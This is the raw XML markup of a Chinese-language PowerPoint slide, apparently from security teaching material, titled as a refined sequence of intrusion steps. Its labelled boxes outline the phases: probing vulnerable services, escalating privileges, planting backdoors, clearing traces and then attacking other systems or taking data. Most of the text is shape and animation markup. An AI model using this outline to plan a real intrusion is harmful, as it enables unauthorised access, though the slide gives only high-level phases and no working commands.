        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="25146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选择</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>最简</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>方式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714759" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1371600" y="4191000"/>
            <a:ext cx="609600" cy="1905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分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>有漏</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>洞的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714760" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="35814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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一定</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>权限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714761" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="2590800"/>
            <a:ext cx="685800" cy="2514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提</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>升</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>最</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>高</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>权</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714762" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="57912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安装</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>多个</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>后门</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714763" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="68580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清除</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>入侵</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>脚印</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714764" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="16764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攻击其</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>他系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714765" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="35052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获取敏</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>感信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714766" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="52578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作为其</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>他用途</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="714767" name="AutoShape 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="32004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8" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="42672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9" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="3657600"/>
            <a:ext cx="4572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0" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="64770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1" name="AutoShape 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="75438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2" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="19812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3" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315200" y="1828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4" name="AutoShape 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="762000" y="4495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5" name="AutoShape 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="7315200" y="45720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4776" name="Group 24"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="1871663"/>
            <a:ext cx="457200" cy="3919537"/>
            <a:chOff x="1296" y="1179"/>
            <a:chExt cx="288" cy="2469"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="714777" name="AutoShape 25"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="3169014">
              <a:off x="1021" y="1454"/>
              <a:ext cx="837" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 72656"/>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8" name="AutoShape 26"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="18430986" flipV="1">
              <a:off x="1021" y="3086"/>
              <a:ext cx="837" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 72656"/>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4779" name="Rectangle 27"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1"/>
              <a:t>较高明（细化）的入侵步骤</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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1349549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4756"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714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4" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="714772"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714772"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714772"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714772"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714772"/>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4757"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7147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714774"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714774"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714774"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714774"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71477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14759"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7147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714776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714776"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714776"/>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714758"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71475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714767"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714767"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714767"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714767"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714767"/>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714760"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71476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714768"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714768"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714768"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714768"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="67" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="714768"/>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14761"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7147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714769"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
